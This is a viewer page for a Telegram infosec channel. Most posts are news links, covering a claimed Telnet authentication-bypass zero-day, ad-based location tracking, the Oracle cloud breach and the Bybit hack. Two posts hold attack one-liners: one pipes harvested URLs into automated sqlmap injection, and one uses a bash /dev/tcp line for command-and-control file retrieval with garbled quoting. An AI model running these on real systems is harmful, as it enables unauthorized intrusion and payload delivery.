TGViewer
Channel Public Channel
cKure Red

cKure Red

@ckured

The director's cut on critical feeds from InfoSec world 🌎

Main Channel: @cKure

β˜•οΈ or queries email us
πŸ“¨ i@ckure.org
Subscribers
2.78K
Photos
73
Videos
69
Links
480

Showing posts older than #583 Β· Back to latest

Older Posts 19 shown
Post #582 1.97K
πŸŸ₯Microsoft Zero-Day drop:
Server MS-TNAP Authentication Bypass [RCE 0day]
A critical 0-click remote authentication bypass vulnerability in Microsoft Telnet Server that allows attackers to gain access as any user, including Administrator, without requiring valid credentials. The vulnerability exploits a misconfiguration in the NTLM Authentication processes of the Telnet MS-TNAP extension allowing remote unauthenticated attackers to bypass authentication completely.


Unconfirmed code
https://github.com/hackerhouse-opensource/hfwintelnet
  • πŸ”₯ 2
  • πŸ‘ 1
  • πŸ‘Œ 1
Post #581 2.36K
Post #580 2.86K
πŸ“Everyone knows your location: Tracking myself down through in-app ads.

https://timsh.org/tracking-myself-down-through-in-app-ads/

πŸ“Everyone knows your location, Part 2: Try it yourself and share the results.

https://timsh.org/everyone-knows-your-location-part-2-try-it-yourself/

➿➿➿➿➿➿➿➿➿➿

analyse-ad-traffic l: A guide + python notebook that helps to collect, analyse and visualise requests sent by a mobile device while using some app.

https://github.com/tim-sha256/analyse-ad-traffic
  • πŸ”₯ 4
  • 🀑 1
Post #579 2.09K
πŸ”€ SQLMap from Waybackurls.

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

Credits: Zlatan H
  • ⚑ 1
  • πŸ”₯ 1
Post #577 1.94K
πŸ“£ Oracle quietly confirms public cloud data breach, customer data stolen.

The attacker exploited a vulnerability in Oracle Access Manager to breach Oracle-hosted servers. The vulnerability is tracked as CVE-2021-35587 and was assigned a critical severity score 9.8/10. It was patched in mid-January 2022, raising questions over whether Oracle kept its own servers vulnerable to a flaw it fixed more than three years ago.

CrowdStrike is investigating the incident along FBI.


https://www.techradar.com/pro/security/oracle-quietly-confirms-public-cloud-data-breach-customer-data-stolen
TechRadar Oracle quietly confirms public cloud data breach, customer data stolen Oracle has sent out breach notifications
  • πŸ”₯ 3
Post #576 2.07K
Post #574 1.72K
🌐 Yet another website: sploitify.haxx.it [interactive public exploit cheat sheet]
  • πŸ‘ 1
  • πŸ”₯ 1
Post #570 2.44K
Post #569 2.04K
πŸ‡°πŸ‡΅Bybit hack technical analysis of the Hack by Lazarus group, North Korean state spinsored hacking group (as calimed by the FBI, United States πŸ‡ΊπŸ‡Έ).
  • 🀩 1
Post #564 2.15K
5️⃣ 1 liner bash for C2 without using any native program like wget, nc etc, esp containers.

bash-c "exec 3<>/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n' >&3; cat <&3-> yourfile.sh'

Source: Linkedin | Harvey Spec
  • πŸ‘Ž 5
Post #563 1.87K
Older posts β†’
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook β†’Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 β†’